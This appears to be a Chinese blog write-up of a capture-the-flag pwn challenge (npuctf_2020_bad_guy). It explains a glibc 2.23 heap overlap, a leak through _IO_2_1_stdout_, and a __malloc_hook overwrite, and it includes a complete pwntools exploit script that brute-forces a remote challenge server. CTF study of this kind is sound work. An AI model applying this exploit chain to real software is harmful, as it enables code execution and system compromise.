IO_FILE(npuctf_2020_bad_guy)

已于 2022-03-24 18:23:19 修改
阅读量408 收藏 1
点赞数
分类专栏: pwn题目 文章标签: pwn glibc
于 2022-03-24 18:21:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/csdn546229768/article/details/123717993
版权

是一道入门IO_FILE的题目

保护:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-EAnd0hbH-1648116914709)(IO_FILE(npuctf_2020_bad_guy)].assets/image-20220316165401820.png)

分析:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-WcCvygiO-1648116914710)(IO_FILE(npuctf_2020_bad_guy)].assets/image-20220316165421263.png)

Add:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-FHwG9g09-1648116914710)(IO_FILE(npuctf_2020_bad_guy)].assets/image-20220316165435013.png)

Edit:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-kjPBNu3x-1648116914710)(IO_FILE(npuctf_2020_bad_guy)].assets/image-20220316165510081.png)

dele

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-NFvKMZuh-1648116914711)(IO_FILE(npuctf_2020_bad_guy)].assets/image-20220316165523069.png)

思路

没有常见的off-by-null,和uaf,但是edit函数可以编辑任意大小的size,且最多malloc10次,edit4次

那么就可以利用堆重叠进行攻击

因为这题需要爆破,所以为了在本地便于调试所以关闭系统的地址随机化(不是永久的)
在这里插入图片描述

1.将chunk2放入到0x70fastbin,便于后面的修改fd指针指向__IO_2_1_stdout的上方处

    malloc(0,0x10)
    malloc(1,0x10)
    malloc(2,0x60)
    malloc(3,0x10)
    free(2)

2.造成堆重叠,即chunk2和chunk3进行重叠形成一个0x90的重叠chunk,再将它放入到unsortbin中

    payload = p64(0)*3 + p64(0x91)# + p64(0) * 3 + p64(0x91)
    edit(0,len(payload),payload)
    free(1)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-3bp6jAOk-1648116914711)(IO_FILE(npuctf_2020_bad_guy)].assets/image-20220316180625737.png)

3.通过malloc切割unsortbin中的大小使它指向0x555555605040

malloc(4,0x10)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-URKyvcxe-1648116914711)(IO_FILE(npuctf_2020_bad_guy)].assets/image-20220316180829983.png)

这样就可以修改0x555555605040的最后2个字节为0x25dd(因为这个地方处于_IO_2_1_stdout的上方,刚好有个0x7f的位置,可以用作fakechunk,和通过fastattack进行写入到__malloc_hook一样的原理)

4.写入IO_FILE的flag值(这里不懂的可以先去学下利用IO_stdout泄漏libc!!很重要)

    payload = p64(0)*3 + p64(0x21) + p64(0)*3 + p64(0x71) + p16(0x25dd) #* 3 + p64(0x91)
    edit(0,len(payload),payload)
    malloc(5,0x60)
    payload = 0x33 * p8(0) + p64(0xfbad800) + p64(0)*3 + p8(0)
    malloc(6,0x60,payload)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-r6JWs3yu-1648116914712)(IO_FILE(npuctf_2020_bad_guy)].assets/image-20220316181359267.png)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-NdWcC29e-1648116914712)(IO_FILE(npuctf_2020_bad_guy)].assets/image-20220316181432090.png)

完成对应的flag值和_IO_write_base,_IO_write_ptr,_IO_write_end等值的设置后控制台就会自动输出你缓存区中的信息,所以你在打_IO_FILE时最好是在unsortbin中构造一些数据,便于泄漏libc

最后就是简单的通过fastbin attack + __malloc_hook进行getshell了

补充:之前做题一直搞不懂ubuntu16.0.4使用的glibc的具体版本,所以就一直下载错了版本从而导致远程打不出来,比如你在glibc-all-in-one中的下载列表中有这些:

在这里插入图片描述

而实际上16.04使用的是2.23-0ubuntu11_amd64,如果你使用的是2.23-0ubuntu11.3_amd64或者2.23-0ubuntu3_amd64那你的one_gadget会有偏差从而导致远程打不出来。因为glibc-all-in-one使用的是清华源,所以2.23-0ubuntu11_amd64会出现找不到的情况,那么就需要将它的源换成国外的进行代理下载,当然自己手动下载也是可以的,不过记得下载debug包!!!(详细的步骤我博客中有)

完整EXP

#! /usr/bin/python
from pwn import *
#import sys

context.terminal = ['terminator', '-x', 'sh', '-c']
#context.log_level = 'debug'
context.arch = 'amd64'
SigreturnFrame(kernel = 'amd64')

binary = "./npuctf_2020_bad_guy"

one = [0x45216,0x4526a,0xf02a4,0xf1147]  #2.23(64)
#idx = int(sys.argv[1])

global p
local = 1
if local:
    p = process(binary)
    e = ELF(binary)
    libc = e.libc
else:
    p = remote("node4.buuoj.cn","29728")
    e = ELF(binary)
    libc = e.libc
    #libc = ELF('./libc_32.so.6')

################################ Condfig ############################################
sd = lambda s:p.send(s)
sl = lambda s:p.sendline(s)
rc = lambda s:p.recv(s)
ru = lambda s:p.recvuntil(s)
sa = lambda a,s:p.sendafter(a,s)
sla = lambda a,s:p.sendlineafter(a,s)
it = lambda :p.interactive()

def z(s='b main'):
    gdb.attach(p,s)

def logs(mallocr,string='logs'):
    if(isinstance(mallocr,int)):
       print('\033[1;31;40m%20s-->0x%x\033[0m'%(string,mallocr))
    else:
       print('\033[1;31;40m%20s-->%s\033[0m'%(string,mallocr))

def pa(s='1'):
    log.success('pause : step---> '+str(s))
    pause()

def info(data,key='info',bit=64):
    if(bit == 64):
      leak = u64(data.ljust(8, b'\0'))
    else:
      leak = u32(data.ljust(4, b'\0'))
    logs(leak,key)
    return leak

################################ Function ############################################
def malloc(i,s,c = 'A'):
    sla('>> ','1')
    sla('Index :',str(i))
    sla('size:',str(s))
    sa('Content:',c)
def edit(i,s,c = 'A'):
    sla('>> ','2')
    sla('Index :',str(i))
    sla('size:',str(s))
    sa('content:',c)
def free(i):
    sla('>> ','3')
    sla('Index :',str(i))
################################### Statr ############################################
def pwn():
    malloc(0,0x10)
    malloc(1,0x10)
    malloc(2,0x60)
    malloc(3,0x10)
    free(2)
    payload = p64(0)*3 + p64(0x91)# + p64(0) * 3 + p64(0x91)
    edit(0,len(payload),payload)
    free(1)
    malloc(4,0x10)
    payload = p64(0)*3 + p64(0x21) + p64(0)*3 + p64(0x71) + p16(0x25dd) #* 3 + p64(0x91)
    edit(0,len(payload),payload)
    malloc(5,0x60)
    payload = 0x33 * p8(0) + p64(0xfbad800) + p64(0)*3 + p8(0)
    malloc(6,0x60,payload)
    pa()
    libc.address = info(ru('\x7f')[-6:]) - (0x7ffff7dd2600 - 0x7ffff7a0d000)
    malloc(7,0x60)
    free(7)
    payload = p64(0)*3 + p64(0x21) + p64(0)*3 + p64(0x71) + p64(libc.symbols['__malloc_hook'] - 0x23) #* 3 + p64(0x91)
    edit(0,len(payload),payload)
    malloc(8,0x60)
    payload = 0x13 * p8(0) + p64(libc.offset_to_vaddr(one[3]))
    malloc(9,0x60,payload)
    sla('>> ','1')
    sla('Index :',str(10))
    sla('size:',str(10))

    p.interactive()
################################### End ##############################################
while 1:
    try:
        pwn()
        break
    except KeyboardInterrupt:
        p.close()
        p = remote("node4.buuoj.cn","29728")
        #p = process(binary)
    except :
        p.close()
        #p = process(binary)
        p = remote("node4.buuoj.cn","29728")

成功截图:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-jppLFLrk-1648116914711)(IO_FILE(npuctf_2020_bad_guy)].assets/image-20220316182030308.png)

HNHuangJingYu
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF-PWN刷题记录25(IO file attack)
weixin_44145820的博客
08-14 1515
背景知识 在做关于IO FILE的攻击的时候,对其中涉及的数据结构的了解必不可少,以下是几个关键的数据结构 FILE 结构 定义在 libio.h 中,如下 struct _IO_FILE { int _flags; /* High-order word is _IO_MAGIC; rest is flags. */ #define _IO_file_flags _flags /* The following pointers correspond to the C++ strea
pwn题堆利用的一些姿势 -- IO_FILE
lifanxin的博客
05-11 5105
IO_FILE概述IO_FILE结构介绍利用IO_FILE进行leakFSOP总结 概述   这是pwn题堆利用系列的第三篇文章,本篇文章主要讲解一下IO_FILE结构在pwn题中的利用。一般来说,想到使用IO_FILE结构,是因为pwn题中没有可以用来leak的函数。 IO_FILE结构介绍   FILE 在 Linux 系统的标准 IO 库中是用于描述文件的结构,称为文件流。 FILE 结构在程序执行 fopen 等函数时会进行创建,并分配在堆中,然后以链表的形式串联起来,但系统一开始创建的三个文件st
npuctf_2020_bad_guy
z1r0的博客
03-27 517
npuctf_2020_bad_guy 查看保护 edit可以改size。 攻击思路:没有show函数,利用unstortedbin打stdout泄露出libc。接着打fd为malloc_hook - 0x23,改malloc_hook为one_gadget即可。 1.肯定是需要unstortedbin的,所以我们可以这样构造,0x10 0x10 0x60,利用chunk0改chunk1size为0x91,这样的话chunk1和chunk2就被包住 了,在改chunk1 size的时候记得先释放一下ch
BUUCTF-PWN刷题记录-17
weixin_44145820的博客
05-06 706
目录nsctf_online_2019_pwn1(堆重叠,_IO_2_1_stdout_泄露libc) nsctf_online_2019_pwn1(堆重叠,_IO_2_1_stdout_泄露libc) 添加没有太大限制,但是会把之前内容清空 删除没有指针悬挂,并且没有show功能 edit有一个off-by-null 利用思路 因为本题的memset清0使得题目变得复杂了一点 进行4次a...
BUU [NPUCTF2020]共 模 攻 击
MikeCoke的博客
10-07 1197
题目 hint 是共模攻击的老套路了,用扩展欧几里得算法就能解出来。 解出来得到的提示为:m.bit_length() < 400 task 这里放上大佬写的博客 链接 这里的 m2 - (c1 + c2)m + c1 * c2 = ijn ≡ 0 mod n 是通过公式化简,得到一个关于未知量 m 的多项式,然后用sage解多项式求根就能得到 flag 了。 我写的代码: from gmpy2 import* from libnum import* from sympy import*
11IO_and_File_System.rar_vxwork
09-19
本教程“11IO_and_File_System.rar”聚焦于VxWorks中的I/O系统和文件系统,是深入理解这两个核心概念的重要参考资料。 I/O系统在任何操作系统中都扮演着至关重要的角色,它负责硬件设备与软件之间的数据交换。在...
09_07_IO_STL标准模板
07-01
09_07_IO_STL标准模板09_07_IO_STL标准模板09_07_IO_STL标准模板09_07_IO_STL标准模板09_07_IO_STL标准模板09_07_IO_STL标准模板09_07_IO_STL标准模板09_07_IO_STL标准模板09_07_IO_STL标准模板09_07_IO_STL标准模板...
io_source.rar_io_super_super io
09-23
在IT行业中,"Super IO"通常指的是一种特殊类型的输入/输出(I/O)控制器,它主要在个人计算机系统中用于管理低级别的硬件接口,如串行口、并行口、键盘、鼠标、软盘驱动器等。这些接口在早期的PC硬件设计中尤为重要,...
fileio_test_FileIo_TheTest_
10-02
本文将深入探讨“fileio_test_FileIo_TheTest_”这个主题,它涉及Verilog中的文件输入/输出(File I/O)操作,这是在验证和调试过程中非常重要的一个方面。 在Verilog中,File I/O允许我们读取和写入文件,这对于...
06-file_io.zip_file操作_linux poll
09-21
本教程通过一系列示例深入探讨了Linux下的文件I/O操作,其中包括`copy_file`、`lock_set`、`poll`、`select`、`standard_io`和`producer`等核心概念。以下是对这些知识点的详细说明: 1. **copy_file**: `copy_file...
NPUCTF writeup
abtgu的博客
04-21 1686
抽象带师 题目: 题目描述:⭕????来????西北工✌️带❄️西踢莪????????赛????????⬆????➖单????????赛 大家笑一笑就好,flag格式NPUCTF{} 解题思路: 直接谐音读出意思,“欢迎来到西北工业大学CTF比赛世界上最简单的比赛”。 web????? 题目: 无 解题思路: 禁止浏览器禁用js即可查看源码,得到flag, flag{6c1e56dd-496e-4bd3-b3c1-1e2445f155e6} 这是什么觅????...
刷题记录-NPUCTF2020(web部分)
weixin_43610673的博客
05-03 4817
在buu刷了一遍,题目好顶,还剩一题EzShiro摸不出来 ReadlezPHP 禁用了右键查看源代码 view-source: 自行加上前缀即可 打开链接/time.php?source 很明显,php反序列化,通过echo b(b(b(a); 写入shell,system等被禁用,用assert(断言) <?php class HelloPhp { public $a; ...
BUUCTF-pwn(12)
njh18790816639的博客
01-13 2876
[极客大挑战 2019]Not Bad orw类型,打开文件,读入内容,输出内容!但需要注意gadget! from pwn import * context(log_level='debug',os='linux',arch='amd64') binary = './bad' r = remote('node4.buuoj.cn',29934) #r = process(binary) elf = ELF(binary) mnap = 0x123000 jmp_rsp = 0x0400a01 r.r
关于glibc-all-in-one缺失libc
hanabi_sh
12-05 904
glibc-all-in-one中还缺少一些libc版本,当我们需要却没有的时候,就可以手动添加以下为2.23-0ubuntu11_amd64案例,发现并没有这个版本
萌新入坑——pwn(1)
weixin_44319142的博客
04-16 326
stack2
Ubuntu安装包依赖问题的一个解决办法
热门推荐
S_1024S的博客
03-08 1万+
Ubuntu类似下面的安装包依赖问题:       libc6-dev : 依赖: libc6 (= 2.23-0ubuntu11) 但是 2.27-3ubuntu1 正要被安装       build-essential: 依赖: g++ (>= 4:4.3.1) 但是它...
pwn题切换不同glibc版本实测
csdn546229768的博客
01-28 3508
pwn题目到了堆题目就是和glibc打交道,所以系统默认的一个libc肯定是满足不了各种题目类型的需求的,刚开始学习pwn时就看别人文章说最好一起下载ubuntu16\ubuntu18没想明白是为什么,直到接触了堆题,哦~原来如此,不过因为我是将ubuntu20安装在了物理机上,所以就想办法给整合在一起了 看了网上大佬们的一些玩法,大概流程就是自己下载libc源码进行编译然后修改程序so文件路径,听起来简单,琢磨了一晚上终究还是没有编译出来,后来还是用下载源码+通过patchelf进行替换,试了下好像确实
浅析IOFILE结构及利用
Peanuts
11-21 3293
浅析IOFILE结构及利用 本文首发于先知社区 在hctf中遇到了这么一个题,也借这个题专门去补了补自己在IOFILE这一块知识点的知识。 libio.h中的结构 struct _IO_FILE { int _flags; /* High-order word is _IO_MAGIC; rest is flags. */ #define _IO_file_flags _...
好好说话之IO_FILE利用(1):利用_IO_2_1_stdout泄露libc
hollk’s blog
02-19 4999
前言 这道题是wiki上tcache attack部分的第二道例题,原题在wiki那个题包里,需要自己找一下,忘记在哪了。。。。。其实个人感觉这道题的考点并不是tcache attack,而是在于IO_FILE的利用。因为这道题与以往所见并不太相同,并没有输出函数,也就意味着无法通过往常的方式利用程序自身的输出函数进行泄露内存地址,所以这时候就需要利用IO_FILE的方式进行输出(我也是第一次遇到,肝了好几天)。这篇文章主要分为两个部分,前半部分主要讲解IO_FILE泄露libc的方式,后半部分是HITCO
extern struct _IO_FILE *stdin;
最新发布
07-12
`extern struct _IO_FILE *stdin;` 是一个外部变量声明,用于声明名为 `stdin` 的全局变量。 在C语言中,`stdin` 是一个预定义的标准输入流,用于从标准输入设备(通常是键盘)读取输入数据。它是一个指向 `_IO_FILE` 结构体的指针,该结构体定义了输入流的属性和操作。 通过使用 `extern` 关键字来声明 `stdin`,您在代码中表明 `stdin` 是在其他地方定义的全局变量,并且您可以在当前文件中使用它。这个声明告诉编译器去其他文件或库中寻找 `stdin` 的定义。 通常情况下,在C标准库中已经定义了 `stdin` 的实际定义,因此不需要手动定义或初始化它。只需包含 `<stdio.h>` 头文件即可访问 `stdin` 变量。 这只是对 `extern struct _IO_FILE *stdin;` 的简单解释。如果您有关于输入流、外部变量或其他方面的更多问题,请随时提问!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值